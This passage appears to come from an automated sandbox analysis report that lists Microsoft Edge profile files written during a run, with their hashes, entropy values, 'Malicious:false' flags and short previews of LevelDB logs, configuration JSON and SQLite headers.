                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):317
                                                                                                                                                                                                                                                Entropy (8bit):5.157238550705001
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/fAF0M1cNwi23oH+Tcwtk2WwnvB2KLlp/fu4q2PcNwi23oH+Tcwtk2WwnvIFUv:7/402ZYebkxwnvFLT/24vLZYebkxwnQg
                                                                                                                                                                                                                                                MD5:9EA84871F336DD1F606A03D471A225F7
                                                                                                                                                                                                                                                SHA1:C222BD00673C83903DC3A8B3431B55693A4121BE
                                                                                                                                                                                                                                                SHA-256:54211542DD2F156EAC4493CF7C279AD5075AFF92DB4EA11745DD6FC94103145E
                                                                                                                                                                                                                                                SHA-512:A3DD092413291FC42EB453F4A169D399F6590FE334B6F3D91532657F8D5F7496A5C5EAF2B2E8E5749F4240880B5AA2121D7DA2E557B396796C0ADCFEB32FB622
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:31.773 1ef4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/16-11:07:31.801 1ef4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):358860
                                                                                                                                                                                                                                                Entropy (8bit):5.324622178393332
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RT:C1gAg1zfv7
                                                                                                                                                                                                                                                MD5:1A9EE508CEF12C1FD4F27103A6F75039
                                                                                                                                                                                                                                                SHA1:A792C08CD4C7670B690331E294B50E564FA9D59B
                                                                                                                                                                                                                                                SHA-256:EC2CDE4C50F72A626F84817BD610EED415441D08C90102680155CD32110C0F99
                                                                                                                                                                                                                                                SHA-512:6BB30C31E3918131E8093273EDA29C1D6124D55E8EE87D95D7D96DE96FFB9AD6ADCB2E2A69D839D4B78387AC6C66957378F4C87297203E54B5E12A8396014482
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):418
                                                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):330
                                                                                                                                                                                                                                                Entropy (8bit):5.185844225816215
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/FAF53+q2PcNwi23oH+Tcwt8aPrqIFUt8O/FCFVZmw+O/FCF5VkwOcNwi23oH+o:7/ibOvLZYebL3FUt8O/AV/+O/AH54ZYD
                                                                                                                                                                                                                                                MD5:7FF67B4864DBDFA2B1A7D7430E892098
                                                                                                                                                                                                                                                SHA1:75C0DC14A959A4BC4097FCC7EA9E3F1144C63B90
                                                                                                                                                                                                                                                SHA-256:A176EBEFFA949FBD4C0128CC1AC8B2395ECA3851DFAB2C31493B6FA6A81B9822
                                                                                                                                                                                                                                                SHA-512:210FC458C25B31AF6D2F43C0052D58C9E3107B12379D9E556668F9FCBEBC7C41755668CA635E0CE9C8E858B4E75D83ED5E3CA39F5BCD3CA6061235451890D295
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:26.825 16e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/16-11:07:26.827 16e8 Recovering log #3.2024/12/16-11:07:26.827 16e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):330
                                                                                                                                                                                                                                                Entropy (8bit):5.185844225816215
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/FAF53+q2PcNwi23oH+Tcwt8aPrqIFUt8O/FCFVZmw+O/FCF5VkwOcNwi23oH+o:7/ibOvLZYebL3FUt8O/AV/+O/AH54ZYD
                                                                                                                                                                                                                                                MD5:7FF67B4864DBDFA2B1A7D7430E892098
                                                                                                                                                                                                                                                SHA1:75C0DC14A959A4BC4097FCC7EA9E3F1144C63B90
                                                                                                                                                                                                                                                SHA-256:A176EBEFFA949FBD4C0128CC1AC8B2395ECA3851DFAB2C31493B6FA6A81B9822
                                                                                                                                                                                                                                                SHA-512:210FC458C25B31AF6D2F43C0052D58C9E3107B12379D9E556668F9FCBEBC7C41755668CA635E0CE9C8E858B4E75D83ED5E3CA39F5BCD3CA6061235451890D295
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:26.825 16e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/16-11:07:26.827 16e8 Recovering log #3.2024/12/16-11:07:26.827 16e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):418
                                                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):334
                                                                                                                                                                                                                                                Entropy (8bit):5.202239767182811
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/FF3+q2PcNwi23oH+Tcwt865IFUt8O/FD0Zmw+O/FDUVkwOcNwi23oH+Tcwt86L:7/rOvLZYeb/WFUt8O/2/+O/K54ZYeb/L
                                                                                                                                                                                                                                                MD5:0774C3D0D0C3C67442FFEC553F9E4EF6
                                                                                                                                                                                                                                                SHA1:C43E1C55F0A1C83622435B656940C852CB640AB2
                                                                                                                                                                                                                                                SHA-256:A6363E945FC7930D15374C3D05DD503FB1C633ABCFF232F125FBAC63C48898D0
                                                                                                                                                                                                                                                SHA-512:E6DA957F6C58CDDFB2A37B1F929F03B0987472FDA8D042ADA2132B6550979CDF0CD24CF8E58954528D4F6829CD715086ACACF3454A9082A3284379958676255E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:26.833 16e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/16-11:07:26.834 16e8 Recovering log #3.2024/12/16-11:07:26.834 16e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):334
                                                                                                                                                                                                                                                Entropy (8bit):5.202239767182811
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/FF3+q2PcNwi23oH+Tcwt865IFUt8O/FD0Zmw+O/FDUVkwOcNwi23oH+Tcwt86L:7/rOvLZYeb/WFUt8O/2/+O/K54ZYeb/L
                                                                                                                                                                                                                                                MD5:0774C3D0D0C3C67442FFEC553F9E4EF6
                                                                                                                                                                                                                                                SHA1:C43E1C55F0A1C83622435B656940C852CB640AB2
                                                                                                                                                                                                                                                SHA-256:A6363E945FC7930D15374C3D05DD503FB1C633ABCFF232F125FBAC63C48898D0
                                                                                                                                                                                                                                                SHA-512:E6DA957F6C58CDDFB2A37B1F929F03B0987472FDA8D042ADA2132B6550979CDF0CD24CF8E58954528D4F6829CD715086ACACF3454A9082A3284379958676255E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:26.833 16e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/16-11:07:26.834 16e8 Recovering log #3.2024/12/16-11:07:26.834 16e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1254
                                                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):330
                                                                                                                                                                                                                                                Entropy (8bit):5.199723788070046
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/t4q2PcNwi23oH+Tcwt8NIFUt8O/sU8JZmw+O/sU8DkwOcNwi23oH+Tcwt8+eLJ:7/uvLZYebpFUt8O/1O/+O/1i54ZYebqJ
                                                                                                                                                                                                                                                MD5:3806CADF90B500B0D79DD32492DDEE7B
                                                                                                                                                                                                                                                SHA1:EBB63C685464A287DC83A2F9CC2623AA37AD15AF
                                                                                                                                                                                                                                                SHA-256:E31F517026293E9B207CF524E1B03DAB259A9C5211A348D238A1E5B45CD4C39F
                                                                                                                                                                                                                                                SHA-512:A7034240E2EDCF8D79A77947966819D612C460D6B41C5715AE32DA0654E41B27292D1C999D0EAD6225A006CFEB80645B080F8F5EC3423995D3793AD2974087C6
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:27.580 1784 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/16-11:07:27.581 1784 Recovering log #3.2024/12/16-11:07:27.581 1784 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):429
                                                                                                                                                                                                                                                Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):8720
                                                                                                                                                                                                                                                Entropy (8bit):0.2191763562065486
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:Bl9tFlljq7A/mhWJFuQ3yy7IOWUSNootdweytllrE9SFcTp4AGbNCV9RUI5K:TG75fOAHd0Xi99pEYHK
                                                                                                                                                                                                                                                MD5:78230829051044BB2B30AA1E5A7C7DA4
                                                                                                                                                                                                                                                SHA1:9D58A813D6F89A335952A8ECC6E708528257F0AF
                                                                                                                                                                                                                                                SHA-256:BEDC86A989B895427D82EA419D39BA9049C550A9E83A9916035674FE5B0E0D7E
                                                                                                                                                                                                                                                SHA-512:331EFFF44352F49B6EAC803520CCD9E2CC978E09E9F16CA173AD36DCC30DC40EDBB1EB3154AEBFE2A765B064417B7C5CF623255D4EFD40E4F0211BF1B8B6A713
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):115717
                                                                                                                                                                                                                                                Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):49152
                                                                                                                                                                                                                                                Entropy (8bit):3.647718136575781
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:aj9P0lP/Kbt3QkQerC773pLDc7gam6IChXjl4RKToaAu:adSP/qe2C7OaSpl4RKcC
                                                                                                                                                                                                                                                MD5:0D4F2B61CE4979DECDC4A83722D158FD
                                                                                                                                                                                                                                                SHA1:92F5C5F715706998192409E942A22511904F8390
                                                                                                                                                                                                                                                SHA-256:4ED505DA9C305FA33D1FB0B963A31B0D34B7EB7D8FE6ACF5A7D9DAAA9FF0977F
                                                                                                                                                                                                                                                SHA-512:7731F6876360A251896FA8EBB3DC29E6D24A6845344728B1AF665F21CEB1A6D5EAB8A5220453119F0D2810FB3236ADB4F9C6EBBF944B39F653AB9927BBA0FC39
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):411
                                                                                                                                                                                                                                                Entropy (8bit):5.281437286232168
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:7/JVvLZYeb8rcHEZrELFUt8O/Jg/+O/KwAI54ZYeb8rcHEZrEZSJ:7/zlYeb8nZrExg8O/G/xoYeb8nZrEZe
                                                                                                                                                                                                                                                MD5:20492F740D4E8FE2CC571A971EFAE353
                                                                                                                                                                                                                                                SHA1:0824F085945D035531C5D96352956F7272E1DDA6
                                                                                                                                                                                                                                                SHA-256:7AA3175F847D2153E966ED8F4EF11EB7BDC8D30D4C0F21E260B93C9514217CBD
                                                                                                                                                                                                                                                SHA-512:8281C8D919B4A902550F7D80457888E0E3F6646F94E1D43FF96E4348275B123475B951040F3A7D157A01AB78A07C191E173C12EA52FCD9E1067BB6AD735346B8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:30.777 450 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/16-11:07:30.777 450 Recovering log #3.2024/12/16-11:07:30.778 450 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1470
                                                                                                                                                                                                                                                Entropy (8bit):5.669307279694029
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:5TZWEUlHDm1lwmuEkjoek5tXZim+W33yV03y1x4/HMyENW/NRdgFHHmN2cfJ3Xo1:5TZNCm7wmuE4lstXZim9HyV03Sx4/syI
                                                                                                                                                                                                                                                MD5:0369F2DEF6026312D1D89FECCF06880C
                                                                                                                                                                                                                                                SHA1:8017D15E82D66726031EDBA4880086C28761574F
                                                                                                                                                                                                                                                SHA-256:F5BAD8AC6314142DF41CE03356E2A6CB368FDDADA03502C7A15F3BF8DA12E494
                                                                                                                                                                                                                                                SHA-512:C296BC67548E2E7BEDD7E4DE7AD2D59D79781F92F7CCB5E1AEC7321353FD481B7E1A2D5A93FCACF3EB71F65E563CEC31F183D3AE32BB93F0B404D97653676CB4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:;..J{................VERSION.1..META:https://ntp.msn.com.............._https://ntp.msn.com..FallbackNavigationResult?.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":902}.!_https://ntp.msn.com..LastKnownPV..1734365264497.-_https://ntp.msn.com..LastVisuallyReadyMarker..1734365265412.._https://ntp.msn.com..MUID!.360240197938679F2CDC554E78216658.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1734365264571,"schedule":[-1,33,-1,-1,-1,16,18],"scheduleFixed":[-1,33,-1,-1,-1,16,18],"simpleSchedule":[39,35,34,36,9,19,11]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1734365264465.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241213.442"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_http
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):342
                                                                                                                                                                                                                                                Entropy (8bit):5.141919525052944
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/Ri+q2PcNwi23oH+Tcwt8a2jMGIFUt8O/TWZmw+O/AIVkwOcNwi23oH+Tcwt8as:7/s+vLZYeb8EFUt8O/K/+O/jV54ZYebw
                                                                                                                                                                                                                                                MD5:15B26349AE87E1D959E931DA8AB3677D
                                                                                                                                                                                                                                                SHA1:5805F907446712A6B026F991C0F85EFF7B2AD221
                                                                                                                                                                                                                                                SHA-256:B59FD437A5F0AFA1E64A2BB5B948C027CBBECFE5B7098FEF161B137658994D7D
                                                                                                                                                                                                                                                SHA-512:A3D264369A1353FE509ED59DE4B49DA437E24131ED83EBE795F9A6BBB558F3C5B351D45BC7A3E568F11DF612366A24A04E69A5A47B7DC1D7A7799546D42567BD
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:27.114 1b0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/16-11:07:27.116 1b0c Recovering log #3.2024/12/16-11:07:27.119 1b0c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                Entropy (8bit):2.7730312980221328
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:tT8p+SFvJIyEAjQqUGxwtLCIfUePKPINuXcf0L/ZJVb:V8ptREAjZUGxwAIfmINuXI0LhJVb
                                                                                                                                                                                                                                                MD5:A9271E5B452E0D577A9785B39BBA398B
                                                                                                                                                                                                                                                SHA1:15AB9D084942F43DF5F6FBF4027BE8FC29E56656
                                                                                                                                                                                                                                                SHA-256:7B461DBB5FC2AE8DDE2AC672EF18AD28C8826272145A308633805049367331C2
                                                                                                                                                                                                                                                SHA-512:C1EE3F2EF3CD42763C36009B37952DFB2D24BFD6E80526F6AE8011CD2E76BA15B9B82B5BFDD11DAA6BAB7E99B68774BBF215577DDAE6A0DFABD562BF9991F781
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1618
                                                                                                                                                                                                                                                Entropy (8bit):5.302994819295006
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:YcCpWsduCvsafc7leeBRsygCgkhYhbyD0:F2vu22keBxukOhn
                                                                                                                                                                                                                                                MD5:90B46E2386024DB7264E402160E5F3B4
